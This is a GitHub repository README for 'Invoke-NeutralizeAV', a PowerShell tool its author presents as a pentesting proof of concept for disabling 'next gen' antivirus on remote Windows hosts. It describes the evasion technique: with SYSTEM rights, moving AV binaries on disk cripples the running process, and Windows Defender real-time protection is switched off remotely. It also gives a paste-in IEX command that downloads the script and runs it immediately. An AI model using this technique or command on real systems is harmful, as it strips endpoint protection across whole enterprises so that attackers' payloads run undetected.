Skip to content

Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting

Notifications You must be signed in to change notification settings

me009/Invoke-NeutralizeAV

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 

Repository files navigation

Invoke-NeutralizeAV

Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting

My projects are my own and do not reflect my employer

Description

I created this PoC based on a recent discovery of mine during a penetration test where I had SYSTEM access but could not stop AV processes or Services. I found that simply moving the binaries on disk to another directory essentially neutralized the running AV process. Use this script to effectively shut down AV across an enterprise environment so you can execute your payloads, etc. There's also an "Enable" switch to set everything back when finished. I recently added support to remotely and temporarily disable "Real Time Protection" for Windows Defender as well if it's detected on the remote host.

Instructions

The assumption is being made that you are first running as SYSTEM or at least a Local or Domain Admin that can elevate to SYSTEM on a Windows OS with PowerShell. If AV is enabled on the target you plan to run this scipt on, it will likely need to be neutralized first before this can be leveraged to disable remote targets. Soon, I'll provide a BAT file so it's not a manual process.

Paste the following into the elevated CMD prompt to download the PS1 script. (Note: You may need to first enable scripts on the host with Set-ExecutionPolicy unrestricted)

  1. powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/curtbraz/Invoke-NeutralizeAV/master/Invoke-NeutralizeAV.ps1')

  2. Enjoy! :)

Invoke-NeutralizeAV Screenshot

Closing Thoughts

This is a quick and dirty PoC. I plan to fix it up and add more functionality soon (arguments instead of prompts, host lists, disabling services & other bypass methods first, quiet mode, etc), but hopefully in the meantime this will assist people to more quickly bypass next gen AV on remote hosts during a pentest. I wrote this script in a dynamic way so I didn't have to keep an ongoing list of current AV Service Names.

About

Quick PoC I Wrote for Bypassing Next Gen AV Remotely for Pentesting

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 100.0%